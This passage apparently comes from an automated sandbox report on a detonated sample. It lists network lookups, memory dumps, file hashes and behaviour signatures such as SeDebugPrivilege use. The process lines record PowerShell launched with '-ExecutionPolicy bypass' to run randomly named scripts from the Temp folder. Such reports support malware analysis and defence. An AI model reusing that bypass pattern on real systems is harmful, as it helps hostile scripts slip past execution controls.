| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
Files
memory/4768-0-0x00007FF8150D3000-0x00007FF8150D5000-memory.dmp
memory/4768-1-0x0000023FA0740000-0x0000023FA0762000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wz2yqxve.pa3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4768-11-0x00007FF8150D0000-0x00007FF815B91000-memory.dmp
memory/4768-12-0x00007FF8150D0000-0x00007FF815B91000-memory.dmp
memory/4768-13-0x00007FF8150D0000-0x00007FF815B91000-memory.dmp
memory/4768-16-0x00007FF8150D0000-0x00007FF815B91000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win11-20240426-en
Max time kernel
85s
Max time network
94s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\appInfo\UqYyr4PZlPm4.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D0 0x00000000000004C8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
memory/4880-0-0x00007FFDF5E13000-0x00007FFDF5E15000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4m5ppzea.ptk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4880-9-0x000001DA7F910000-0x000001DA7F932000-memory.dmp
memory/4880-10-0x00007FFDF5E10000-0x00007FFDF68D2000-memory.dmp
memory/4880-11-0x00007FFDF5E10000-0x00007FFDF68D2000-memory.dmp
memory/4880-12-0x00007FFDF5E10000-0x00007FFDF68D2000-memory.dmp
memory/4880-15-0x00007FFDF5E10000-0x00007FFDF68D2000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win10v2004-20240508-en
Max time kernel
140s
Max time network
134s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\tAoMyd4BMpNH.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x4f8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4108 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
memory/3972-0-0x00007FFF90473000-0x00007FFF90475000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kdmag1fl.ter.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3972-1-0x000001ECAA0B0000-0x000001ECAA0D2000-memory.dmp
memory/3972-11-0x00007FFF90470000-0x00007FFF90F31000-memory.dmp
memory/3972-12-0x00007FFF90470000-0x00007FFF90F31000-memory.dmp
memory/3972-13-0x00007FFF90470000-0x00007FFF90F31000-memory.dmp
memory/3972-16-0x00007FFF90470000-0x00007FFF90F31000-memory.dmp